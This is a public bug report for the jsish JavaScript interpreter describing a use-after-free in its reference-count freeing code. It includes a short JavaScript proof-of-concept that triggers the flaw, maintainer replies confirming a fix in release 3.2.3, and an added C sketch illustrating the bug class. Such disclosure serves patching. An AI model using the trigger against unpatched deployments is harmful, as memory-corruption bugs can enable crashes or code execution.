Use After Free in JsiInterp:643 #18
PoC
var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free
FossilOrigin-Name: 930e210f5d990ed4953cf49cb9d7528247c0d55d19b9158d60cec49f46649986
Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"
The source code I use is http://jsish.org/zip
Build Environment
Ubuntu 16.04 x86_64
I probably wasn't clear. I meant yes you did find a problem. But it should be fixed now, in the code I just committed today for "3.2.3".
Description
When jsi_DecrRefCount calls the jsi_freeValueEntry function, it incorrectly references the heap block that has been freed by jsi_freeValueEntry (src/jsiInterp.c:643), causing the Use After Free vulnerability.
Build Environment
Ubuntu 16.04 x86_64
gcc version 6.5.0 20181026
Debug Information
backtrace
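The bug class in the description (a reference-count decrement that releases a value and then touches it again) is sketched below as an added example; it is not jsish code and not part of the original issue. Every name in it (`value_t`, `value_release`, `decr_ref_buggy`, `decr_ref_fixed`) is hypothetical, and a poisoned static pool stands in for the heap so the stale access is detected deterministically instead of being undefined behaviour.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical value type and pool; none of these names come from jsish. */
typedef struct { int refcnt; int flags; int live; } value_t;

#define POOL 4
static value_t pool[POOL];
static int stale_reads;              /* counts accesses to released slots */

static value_t *value_new(void) {
    for (int i = 0; i < POOL; i++)
        if (!pool[i].live) {
            pool[i] = (value_t){ .refcnt = 1, .flags = 0, .live = 1 };
            return &pool[i];
        }
    return NULL;
}

/* Stand-in for free(): poison the slot so later reads are recognisable. */
static void value_release(value_t *v) {
    memset(v, 0xDD, sizeof *v);
    v->live = 0;
}

/* Checked accessor: records a touch of a released slot instead of trusting it. */
static int value_flags(value_t *v) {
    if (!v->live) { stale_reads++; return -1; }
    return v->flags;
}

/* Buggy ordering: the value is released, then inspected again. */
static int decr_ref_buggy(value_t *v) {
    if (--v->refcnt <= 0)
        value_release(v);
    return value_flags(v);           /* touches v after release */
}

/* Corrected ordering: read what is needed first, release last. */
static int decr_ref_fixed(value_t *v) {
    int flags = value_flags(v);
    if (--v->refcnt <= 0)
        value_release(v);
    return flags;
}

int main(void) {
    value_t *a = value_new();
    a->flags = 7;
    int fixed = decr_ref_fixed(a);
    value_t *b = value_new();
    b->flags = 7;
    int buggy = decr_ref_buggy(b);
    printf("fixed=%d buggy=%d stale_reads=%d\n", fixed, buggy, stale_reads);
    return 0;
}
```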